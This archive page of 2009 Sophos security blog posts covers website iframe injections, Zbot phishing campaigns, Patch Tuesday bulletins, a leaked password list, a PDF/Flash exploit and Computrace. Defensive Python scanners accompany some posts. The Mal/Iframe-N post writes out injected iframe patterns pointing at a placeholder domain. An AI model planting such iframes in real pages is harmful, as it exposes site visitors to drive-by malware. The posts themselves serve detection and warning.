Sophos

Archive for the ‘Vulnerabilities’ Category

Famous chip shop website battered by malicious Iframe injection

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the famous chip shop brand Harry Ramsden’s website had been haked by a malicious iframe. I codn’t believe it when I saw that the mootools.js script on the site is infected with Troj/Iframe-DF meaning that the website isn’t the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany that when you go there redirects you to a fake Google site registered in the EU. Which triggers Troj/ObfJS-R.

I don’t want to carp on about the responsibilities of Web masters and Web hosters but they really have to protect their sites as well as tuna them up.

All this talk of fish ’n’ chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)


November’s Patch-Tuesday roundup…

This month’s “Patch Tuesday” includes 6 security updates, of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 as Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several kernel vulnerabilities. The vulnerability of particular concern is related to specially crafted Embedded OpenType fonts, and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see typically run in the user context at the same privilege level as the currently authenticated user. Now, if you’re the user this means that all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn’t been adhering to best practices, and has granted you administrative privileges … in which case you’ve pretty much granted the attacker’s code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user’s privilege level is irrelevant. It doesn’t matter how unprivileged the current user is - the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn’t destabilize the system and BSOD before their code runs. Kernel vulnerabilities have a habit of not just bringing down processes, but bringing down entire boxes.

MS09-068 is mention-worthy, as it addresses issues in Microsoft Word for both the Windows AND Apple platforms. Windows users who have automatic updates configured will receive the fix automatically, but Apple users will have to rely on the Microsoft Office update utility, “Microsoft AutoUpdate”, or go here, here or here to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com


From Server/Outlook update to FDIC to facebook phish: now with a twist

In the past few weeks, the authors behind Zbot have been busy. Around October 12 we saw the server upgrade spam with links. Later, on the 14th, we saw the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages were touting Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever are going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their Facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they are shown a fake Facebook login page:

Victims who enter their Facebook login have their account details phished, probably for the purpose of spreading more malware. Since this is not a real Facebook page, any random login info brings you to this next page:

It is on this page that the malware author provides an executable for download. This file, updatetool.exe, is a Zbot executable that is proactively detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be really careful when reading messages, whether in an email or from a social network. Avoiding clicking links directly, manually typing the address to access the site, and not executing downloaded files would go a long way towards protecting one’s computer.
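The advice above (don’t click links directly, don’t run downloaded files) can be partly automated at the mail gateway. The following is an added example, not code from the original post or from Sophos: it extracts the links from an HTML message body and flags three of the indicators that the Facebook lure shows, namely visible link text naming one domain while the href points to another, a target outside the brand’s own domain, and a link that downloads an executable. The sample message, the DOMAIN.TLD placeholder and the trusted-domain list are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message body (not the Zbot message from the post). The
# first link's visible text claims to be facebook.com but its href goes to a
# placeholder domain; the last link offers the executable named in the post.
SAMPLE_EMAIL = """<p>Dear user, please update your account:</p>
<a href="http://update.DOMAIN.TLD/facebook/login">http://www.facebook.com/update</a>
<p>Or visit <a href="https://www.facebook.com/help">our help centre</a>.</p>
<a href="http://DOMAIN.TLD/updatetool.exe">Download update tool</a>
"""

# Hypothetical allow-list: domains a message claiming to be from this brand may link to.
TRUSTED = {"facebook.com"}

# Visible anchor text that itself looks like a URL or hostname.
URL_LIKE = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in the message."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL, tolerating bare 'www.example.com/path' text."""
    return urlsplit(url if "://" in url else "http://" + url).hostname or ""


def registrable(host):
    """Crude registrable domain: the last two labels (enough for this example)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def check_links(html, trusted=TRUSTED):
    """Return [(href, [reasons])] for links that match a phishing indicator."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        reasons = []
        href_dom = registrable(host_of(href))
        # 1. The text the reader sees names a different domain than the real target.
        if URL_LIKE.match(text):
            text_dom = registrable(host_of(text))
            if text_dom and text_dom != href_dom:
                reasons.append("link text shows %s but points to %s" % (text_dom, href_dom))
        # 2. The target is not one of the brand's own domains.
        if href_dom not in trusted:
            reasons.append("target %s is not a trusted domain" % href_dom)
        # 3. The link hands the reader an executable directly.
        if urlsplit(href).path.lower().endswith(".exe"):
            reasons.append("link downloads an executable")
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in check_links(SAMPLE_EMAIL):
        print(href, "->", "; ".join(reasons))
```

The domain comparison is deliberately simple (last two labels), so it will mis-handle country-code second-level domains such as co.uk; a production filter would use the public suffix list instead.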


Mal/Iframe-N: The next big threat?

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct), SophosLabs have seen a rising number of detections; thousands of websites are now affected by this threat. A couple of the sites hit are well known, and one of them, which I previously talked about as having been infected, is the official Van Morrison site.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time to explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious iframes have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas in the new attack there isn’t a direct src=; instead they use onload=, like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these iframes are currently appending them to the end of legitimate HTML.
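The three indicators this post and the Harry Ramsden’s post describe (a src= frame with tiny width and height, a src assigned from an onload= handler instead of a src attribute, and the injection being appended after the legitimate HTML) are easy to check for when auditing a site’s own pages. The following scanner is an added example, not code from the original post or from Sophos; the sample page and the DOMAIN.TLD placeholder are constructed, and the 10-pixel threshold is an assumption.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not from the original post): a legitimate page with
# a normal ad-sized frame, then two injected iframes appended after </html>,
# one of each form described in the post. DOMAIN.TLD is the post's placeholder.
SAMPLE_HTML = """<html><body><p>Welcome to our site.</p>
<iframe src="http://partner.example/widget" width="300" height="250"></iframe>
</body></html>
<iframe src=http://DOMAIN.TLD width=1 height=1></iframe>
<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=1; this.width=1;}"></iframe>
"""

TINY = 10  # assumption: a frame this small (pixels) is invisible to the visitor

ONLOAD_SRC = re.compile(r"this\.src\s*=\s*['\"]([^'\"]+)['\"]")


class IframeCollector(HTMLParser):
    """Record every <iframe> start tag and whether it appeared after </html>."""
    def __init__(self):
        super().__init__()
        self.iframes = []        # (attrs dict, seen_after_html_close)
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((dict(attrs), self.html_closed))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True


def _dimension(attrs, onload, name):
    """Width/height from the attribute, or from a this.<name>=N assignment in onload."""
    value = attrs.get(name)
    if value is None:
        m = re.search(r"this\.%s\s*=\s*(\d+)" % name, onload)
        value = m.group(1) if m else None
    try:
        return int(str(value).strip())
    except (TypeError, ValueError):
        return None


def find_suspicious_iframes(html):
    """Return [{'src': ..., 'reasons': [...]}] for iframes that match any of the
    indicators: src set in onload, tiny dimensions, placed after </html>."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs, after_close in parser.iframes:
        onload = attrs.get("onload") or ""
        src = attrs.get("src")
        reasons = []
        m = ONLOAD_SRC.search(onload)
        if src is None and m:
            src = m.group(1)
            reasons.append("src set from onload handler")
        width = _dimension(attrs, onload, "width")
        height = _dimension(attrs, onload, "height")
        if width is not None and height is not None and width <= TINY and height <= TINY:
            reasons.append("tiny dimensions")
        if after_close:
            reasons.append("appended after </html>")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_HTML):
        print(f["src"], "->", ", ".join(f["reasons"]))
```

Run it over the HTML a web server actually returns (or over the JavaScript files it serves, as in the mootools.js case) rather than over the files in the repository, since the injection happens on the live host.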


‘Phished’ Password list:- A quick analysis

The Disney song ”The Wonderful Thing About Tiggers” has the lyric:

I’m the only one!
I-I-I-I’m…..the only one!

Except, it seems, when we are talking about passwords in the latest list of ‘phished’* passwords. Thanks to the people on the Neowin blog for pointing me at the data. After a quick analysis of the list, some of the most popular passwords are:

neopets
123456
monkey
123321
tigger
password
princess
pokemon
kitty
casper
123456789
neopet
anime
iloveyou

As well as being insecure, these passwords suggest a preoccupation with children’s popular culture. I would advise that parents not only change their own passwords and check their computer security, but also ensure that their kids change their passwords on their email accounts as well as on any online forums they belong to.
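The “quick analysis” above is a frequency count, and the most useful thing a site operator can do with such a list is refuse the entries on it at registration time. The following is an added example, not code from the original post or from Sophos: it ranks a constructed sample of credentials by frequency, and then checks candidate passwords against a blocklist seeded with the post’s top entries, normalising case and trailing digits so that obvious variants such as Neopets1 are caught too. The sample list and the normalisation rule are assumptions for the example.

```python
import re
from collections import Counter

# Constructed sample of leaked credentials (not the list analysed in the post);
# the values echo the post's top entries so the ranking is recognisable, plus
# two strong passwords that a blocklist should let through.
SAMPLE_PASSWORDS = [
    "neopets", "123456", "monkey", "neopets", "tigger", "123456", "Neopets1",
    "password", "123456", "princess", "neopets", "monkey", "Tigger", "iloveyou",
    "Tr0ub4dor&3", "correct-horse-battery",
]

# Blocklist built from the post's most common entries.
BLOCKLIST = {"neopets", "123456", "monkey", "123321", "tigger", "password",
             "princess", "pokemon", "kitty", "casper", "123456789", "neopet",
             "anime", "iloveyou"}


def normalise(pw):
    """Lower-case and strip leading/trailing digits and symbols, so that
    'Neopets1' and 'tigger!' collapse onto the base word a guesser would try.
    All-digit passwords such as '123456' are returned unchanged."""
    base = re.sub(r"^[\d\W_]+|[\d\W_]+$", "", pw.lower())
    return base or pw.lower()


def most_common(passwords, n=5):
    """Rank passwords by exact frequency, as in the post's quick analysis."""
    return Counter(passwords).most_common(n)


def is_blocked(pw, blocklist=BLOCKLIST):
    """True if the password, or its normalised base word, is on the blocklist."""
    return pw.lower() in blocklist or normalise(pw) in blocklist


def blocked_share(passwords, blocklist=BLOCKLIST):
    """Fraction of accounts a blocklist check would have rejected at signup."""
    hits = sum(1 for p in passwords if is_blocked(p, blocklist))
    return hits / len(passwords) if passwords else 0.0


if __name__ == "__main__":
    for pw, count in most_common(SAMPLE_PASSWORDS):
        print("%-10s %d" % (pw, count))
    print("would have been rejected: %.0f%%" % (100 * blocked_share(SAMPLE_PASSWORDS)))
```

In practice the blocklist should be much larger than fourteen words (the full leaked list, plus dictionary words and the site’s own name), and the check should be applied when a password is set, not only when a breach is analysed afterwards.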

* There is some debate in SophosLabs about these recent password lists as to whether they are the result of traditional spam phishes or other things.

Personally, I think this data is a combination of:

  • some phishing emails
  • keylogger data
  • and a rogue social networking application phishing information

However this password list was compiled, all users should follow a password routine.

Simple tips for better web password security from SophosLabs on Vimeo.


Phishing via snail mail - Shishing?

UPDATE: This appears to have been a pen-test.

There are reports (via ISC) that US banking institutions have been subject to phishing attempts via snail mail.

Reportedly, the credit unions receive a package containing a letter from the NCUA and a CD with training material on it. If the training material is actually malware, then one would suspect it most likely consists of a backdoor Trojan or a keylogger.

The NCUA press release gives slightly more information on this threat, with some instructions on what to do if you receive the letter:

  • You should contact your NCUA Regional Office
  • or the NCUA Fraud Hotline at 1-800-827-9650

In addition to this advice, please contact your AV supplier and forward them a copy of the CD.

You can contact Sophos via:

Sophos Inc.
3 Van de Graaff Drive
2nd Floor
Burlington, MA
01803
USA

Tel: 781-494-5800
Fax: 781-494-5801


BIOS Rootkit talks…..

Two very talented researchers from CoreSecurity have recently presented at BlackHat on a new twist in the saga of security products whose presence may actually be a security risk. Anibal Sacco and Alfredo Ortega have exposed the presence, and potential security risk, of a post-theft-recovery product that may already be installed on your laptop.

These two have exposed a vulnerability in the security model of Absolute Corp’s Computrace Anti-Theft Agent, which comes included in the BIOS of most notebooks sold since 2005. The Absolute Computrace technology is designed to report the location of a laptop and, in the event of theft, allow the data on the laptop to be deleted.

When activated, the BIOS component of Computrace directly alters the Windows filesystem to install and activate its agent. Once Windows has started up, this agent runs as a Windows service which connects out to a remote server to wait for instructions. At BlackHat 2009, Anibal and Alfredo demonstrated how an unauthorized privileged user could hijack the agent to contact a server of their choice. Unfortunately for AV vendors, a hijacked agent is identical to a legitimate one. The only changes on the system are to a region of memory that directs where the agent reports to. The agent’s executable remains unchanged.

Many security professionals (including the authors) are referring to this as a rootkit. I personally think this is more of an extremely persistent backdoor. But those that call it a rootkit have a decent reason for doing so. Unlike most rootkits, this doesn’t actually hide anything. The purpose of rootkits is typically to avoid detection so that a hacker’s control of a system can persist as long as possible. The parallel between this insecurity and most rootkits is the persistence aspect. If abused, this could potentially be used to provide an indirect backdoor into your system that could survive reformats, and even the complete replacement of your hard drive.

So… Do you think Sophos should detect the Computrace Agent? Let us know what you think!


Flash in the PDF? Another vulnerability with Adobe PDF/Flash

Over the weekend, SophosLabs received a strange PDF from a source who sends us large numbers of malicious files of Chinese origin. The PDF file contained two EXE files and two SWF files.

The EXEs were stored within the PDF, XOR encrypted with the bytes 0x97 and 0xa0, which immediately piqued the interest of the analyst. After subsequent analysis of the files he wrote three identities, Troj/PDFEx-BJ, Troj/Agent-KPF and Troj/SWFExp-M, for the PDF file, the EXE files and one of the SWF files respectively.
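Single-byte XOR is a common way to keep an embedded executable from matching a plain “MZ” signature, and it is just as easy to undo when triaging a suspicious document. The following is an added example, not code from the original post or from SophosLabs: it builds a constructed PDF-like container holding two stand-in executables XOR-encoded with 0x97 and 0xa0, then recovers both by searching for the DOS stub string under every single-byte key and walking back to the nearest “MZ” under the same key. Treating 0x97 and 0xa0 as two separate single-byte keys is an assumption; the post does not say whether they were applied to separate files or as one two-byte key.

```python
import re

DOS_STUB = b"This program cannot be run in DOS mode"


def fake_executable():
    """Constructed stand-in for a PE file: MZ header, DOS stub text, PE marker
    and filler. Not a real executable, just enough for the scanner to recognise."""
    return b"MZ" + b"\x90" * 62 + DOS_STUB + b"\x00" * 16 + b"PE\x00\x00" + b"\x00" * 64


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (self-inverse)."""
    return bytes(b ^ key for b in data)


def build_sample_pdf():
    """Constructed PDF-like container (not the sample from the post) with two
    embedded executables, one XOR-encoded with 0x97 and one with 0xa0."""
    return (b"%PDF-1.4\n1 0 obj << /Type /EmbeddedFile >> stream\n"
            + xor_bytes(fake_executable(), 0x97) + b"\nendstream\nendobj\n"
            + b"2 0 obj stream\n" + xor_bytes(fake_executable(), 0xa0)
            + b"\nendstream\n%%EOF")


def find_xor_executables(blob, keys=range(256)):
    """Look for the DOS stub string under each single-byte key; for every hit,
    locate the nearest preceding 'MZ' under the same key (the stub normally sits
    within the first few hundred bytes of a PE). Returns sorted [(offset, key)].
    Key 0 is included, so plain unencoded executables are reported as well."""
    found = []
    for key in keys:
        needle = xor_bytes(DOS_STUB, key)
        encoded_mz = xor_bytes(b"MZ", key)
        for m in re.finditer(re.escape(needle), blob):
            start = blob.rfind(encoded_mz, max(0, m.start() - 512), m.start())
            if start != -1:
                found.append((start, key))
    return sorted(found)


def recover(blob, start, key, length):
    """Decode `length` bytes of the embedded file beginning at `start`."""
    return xor_bytes(blob[start:start + length], key)


if __name__ == "__main__":
    sample = build_sample_pdf()
    for offset, key in find_xor_executables(sample):
        head = recover(sample, offset, key, 2)
        print("embedded executable at offset %d, XOR key 0x%02x, header %r" % (offset, key, head))
```

The same scan works on any carrier file, and extending it to two-byte repeating keys only means trying 65,536 candidate keys instead of 256; the recovered bytes are what the Troj/Agent-KPF identity would then be matched against.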

Over the last few days we have seen more files exhibiting similar characteristics. What is happening?

The initial PDF file has several embedded streams (according to Didier Stevens’ PDFiD, 18 of them); the interesting ones are two SWF files and one mini-PDF file.

The mini-PDF file has some interesting features (underlined in red):

As we can see from the image above, there are embedded files and it is using RealMediaContent.

Here we see two SWF files (fancyBall.swf and oneoff.swf) referenced and run by the PDF.

The first SWF, fancyBall.swf, is just a simple little Flash animation of a ball; it crashes, which then allows the code in the second SWF file to run.

The other SWF, oneoff.swf, is more insidious (and I have updated detection for Troj/SWFExp-M to detect more variants): using shellcode, it attempts to extract the EXE files and run them. Different instances of this malware have had different names, including save.swf and oneoff.swf.

SophosLabs yesterday released detection for Mal/PDFEx-G to generically detect the malicious PDFs.

Currently, US-CERT recommends the following workaround:

  • Disable Flash in Adobe Reader 9 on Windows platforms by renaming the following files: “%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll” and “%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll”.

As always SophosLabs endeavors to provide customers with proactive detection via identities and product features (HIPs and BOPs).


July 2009 Microsoft Security Bulletins

The latest set of Microsoft Security Bulletins comes only a day after the publicly exploited vulnerability in Office Web Components was disclosed and exploited by several websites hosted in China.

There are 3 bulletins rated Critical by Microsoft, and those are the most interesting for malware writers too, with exploits for MS09-032 already seen in the wild for more than a week. All currently known exploits for MS09-032 are detected by Sophos products as Exp/VidCtl-A or proactively as Troj/JSShell-D.

MS09-029 is a vulnerability in the Embedded OpenType Font Engine which allows the attacker to take complete control of the victim’s system by serving maliciously crafted font files embedded in web pages. This vulnerability has the potential to become popular in malware-writing circles, considering its web-based delivery mechanism.

As always, we have created our own vulnerability analyses, and we will be looking actively for any new exploits appearing in the next few weeks to add detection for them.

Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution - MS09-028
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Cumulative Security Update of ActiveX Kill Bits


Office Web Components exploits in the wild

Only a week after the serious vulnerability in the MPEG2TuneRequest ActiveX control object, Microsoft has released a security advisory documenting a remote code execution vulnerability affecting Microsoft Office Web Components that may allow an attacker to take control of the victim’s machine by creating a malicious web page.

Sophos has received reports of several websites, mostly hosted in China, that serve the exploit as part of a web exploit kit which downloads and runs a Windows executable detected by Sophos products as Mal/Generic-A.

The newly announced vulnerability is serious as there are no patches yet, but a workaround has been documented by Microsoft. SophosLabs are in the process of collecting all known samples and publishing detection for them as Exp/OWCRef-A.

As usual, we have written a SophosLabs analysis of the vulnerability, which includes the SophosLabs threat level: Critical, since the patch is not yet available. Since tomorrow is a Microsoft Patch Tuesday, there will be more to report soon.